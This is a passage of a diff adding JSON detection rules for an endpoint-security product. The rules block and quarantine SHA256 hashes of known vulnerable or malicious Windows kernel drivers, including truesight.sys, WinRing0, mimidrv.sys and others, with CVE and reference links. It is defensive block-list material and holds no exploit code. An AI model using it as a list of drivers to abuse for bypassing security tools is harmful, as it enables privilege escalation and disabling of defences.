+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74bc7ae43c81d7d15c53d1182a7c531928849af5a8f7a0efc330b1c06a1fd124",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98a71bc1-72a2-5132-91a8-247c20d6bfaa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475283Z",
+ "creation_date": "2026-03-23T11:45:31.475286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1505e946a9a25ab41592508a479846bfaaddcd7e78216cb199dec969247de48",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98a7d636-307f-56a3-8f0b-2207a6af3762",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476820Z",
+ "creation_date": "2026-03-23T11:45:31.476824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a4c13dd5f92998c181129822281408859e2aad4616d3f05f935c0e9ccd19137",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98accf8d-268d-5b0c-afd5-f4afb4f1f8cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828507Z",
+ "creation_date": "2026-03-23T11:45:30.828509Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "665dc47a18dbaa857591a35072a24032c26a05167823950dda3f2b5791ae027c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98bcf4cc-3020-5c16-9f72-d3dada4c6ed5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826084Z",
+ "creation_date": "2026-03-23T11:45:31.826086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826092Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2d89424cae23b487c0f580f69cdb0ea2da8a58bc038f554e3fed210776bff35",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98bd7951-ad9a-5726-8f32-85a341713d30",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974333Z",
+ "creation_date": "2026-03-23T11:45:29.974334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ad7bdf11a7ce7296a06eb4f14091df84fafdb04413e714f09f9ea6c686a1323",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98c2e70b-1d51-53f5-9ed4-2f3fe7196040",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617202Z",
+ "creation_date": "2026-03-23T11:45:29.617204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617209Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98c3c19b-90c1-5c90-a9de-8a522f13d080",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817686Z",
+ "creation_date": "2026-03-23T11:45:31.817689Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "901a8d1e209b63a83a16d870a5563a2d51db27f1bea484f42f234fc8ee0d6595",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98c6e807-cc00-5ede-8bd1-771b12ac761b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143594Z",
+ "creation_date": "2026-03-23T11:45:32.143596Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c35cab244bd88bf0b1e7fc89c587d82763f66cf1108084713f867f72cc6f3633",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98c70085-c674-592c-ae8e-bca53da23384",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985740Z",
+ "creation_date": "2026-03-23T11:45:29.985742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23e89fd30a1c7db37f3ea81b779ce9acf8a4294397cbb54cff350d54afcfd931",
+ "comment": "Malicious Kernel Driver (aka malicious.sys) [https://github.com/zeze-zeze/CYBERSEC2023-BYOVD-Demo] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98d18dc5-d517-5700-b173-f61ea7994452",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810415Z",
+ "creation_date": "2026-03-23T11:45:31.810417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90c0b84e071d00031d7c429b667af2df9caaf83e2ad5df14606016dc26006893",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98daac20-5062-5e00-ab18-49c14c5188ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810930Z",
+ "creation_date": "2026-03-23T11:45:31.810932Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b3a2145383699b2bec4d5c54ee6ccabeb3b1ce316db81cccc5fac2d40ee5564",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99078a23-fb8c-5c6d-b22b-ea7812c56b61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143096Z",
+ "creation_date": "2026-03-23T11:45:32.143098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a41e9bb037cf1dc2237659b1158f0ed4e49b752b2f9dae4cc310933a9d1f1e47",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99078e89-79b3-52a8-9d89-cb693ed496ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452738Z",
+ "creation_date": "2026-03-23T11:45:30.452742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452751Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "feef191064d18b6fb63b7299415d1b1e2ec8fcdd742854aa96268d0ec4a0f7b6",
+ "comment": "Vulnerable Kernel Driver (aka fiddrv64.sys) [https://www.loldrivers.io/drivers/64f3d4b0-6d2b-4275-b3d4-15d092af4092/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "990e9f03-dc6a-5661-8f56-3b342d77e12f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157101Z",
+ "creation_date": "2026-03-23T11:45:31.157103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e97da3dd77998a3b28a21f73d996613b10926dca1496f66f2aa928e44e967ea5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "990ea36a-da4f-5779-9c6e-d27330140e6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480843Z",
+ "creation_date": "2026-03-23T11:45:31.480846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e53f7184c76652cb62d46440b14c331ae2e27018497d827d125169c959dc2950",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9917aa9c-8f2e-52dd-ab92-c987e6b2976a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610104Z",
+ "creation_date": "2026-03-23T11:45:29.610106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a9d481ffdc5c1e2cb50cf078be32be06b21f6e2b38e90e008edfc8c4f2a9c4e",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "991b5bca-5c20-5b7c-a3d5-61827690242a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980413Z",
+ "creation_date": "2026-03-23T11:45:29.980415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e77786b21dbe73e9619ac9aac5e7e92989333d559aa22b4b65c97f0a42ff2e21",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99253507-6863-50b3-85a6-77bf8607ef07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146801Z",
+ "creation_date": "2026-03-23T11:45:32.146803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a2a0f9c56ee9bf7b62e1d4e1929d13046cd78a93d8c607fe4728cc5b1e8d050",
+ "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/9974b134-7fee-4c7a-9b0d-38b3b2d7e957/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "99281d70-da9e-580a-9d01-b8d73c63f114",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972474Z",
+ "creation_date": "2026-03-23T11:45:29.972476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "992e2097-5c6e-5899-a3b6-c9435436ec22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470520Z",
+ "creation_date": "2026-03-23T11:45:30.470524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470535Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1b3a3a67599aae12c073ba5ca0928c2c316d438c2b5462194c97687dda64903",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "992f4778-07a1-5cdc-bd68-6de12f3fdcc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835928Z",
+ "creation_date": "2026-03-23T11:45:30.835930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0beeaa2d2dc2bb86bfbf82651967d3edff104c565cf94b57b853adc70e8429fb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9933d83a-1366-5eec-b7e4-db339e2ef8c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479686Z",
+ "creation_date": "2026-03-23T11:45:30.479688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3972159a58fd04da06f648c3828648cf394d3eb6af89538166cae8e6184c3eb6",
